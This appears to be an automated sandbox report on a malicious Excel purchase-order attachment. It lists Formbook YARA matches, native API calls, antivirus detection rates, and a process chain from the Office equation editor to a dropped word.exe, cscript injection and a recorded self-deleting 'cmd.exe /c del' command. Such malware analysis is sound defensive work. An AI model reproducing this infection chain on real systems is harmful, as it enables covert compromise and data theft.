          Source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: String function: 0099DF5C appears 95 times
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: String function: 00A0F970 appears 60 times
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: String function: 0099E2A8 appears 31 times
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: String function: 009E373B appears 185 times
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: String function: 009E3F92 appears 85 times
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 02343F92 appears 132 times
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 0234373B appears 238 times
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 022FE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 0236F970 appears 83 times
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 022FDF5C appears 119 times
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041A350 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041A400 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041A480 NtClose,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041A530 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041A34A NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041A3FB NtReadFile,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041A47B NtClose,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_009900C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00990048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00990078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_009910D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00990060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_009901D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0099010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00991148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_009907AC NtCreateMutant,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098F8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098F938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00991930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098FAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098FA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098FA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0098FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022F00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022F07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022F0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022F0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022F0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022F10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022F010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022F1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022F01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022F1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022F0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022EFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022F1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008A350 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008A400 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008A480 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008A530 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008A34A NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008A3FB NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008A47B NtClose,
          Source: 5C24.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nskF75C.tmp\mtmmtvzho.dll 9679F0E8F63974D80F953B8212B2668C27EC9762CDCF6ACBFD4FDF4B6D189F23
          Source: C:\Users\user\AppData\Roaming\word.exe | Memory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exe | Memory allocated: 76E90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exe | Memory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exe | Memory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exe | Memory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exe | Memory allocated: 76E90000 page execute and read and write
          Source: HME AG PO 2091.xlsx | Virustotal: Detection: 42%
          Source: HME AG PO 2091.xlsx | ReversingLabs: Detection: 32%
          Source: C:\Users\user\AppData\Roaming\word.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exe | Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\word.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exe | Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\word.exe"
          Source: C:\Users\user\AppData\Roaming\word.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$HME AG PO 2091.xlsx
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVREA4E.tmp
          Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@9/9@3/3
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: HME AG PO 2091.xlsx | Static file information: File size 1703303 > 1048576
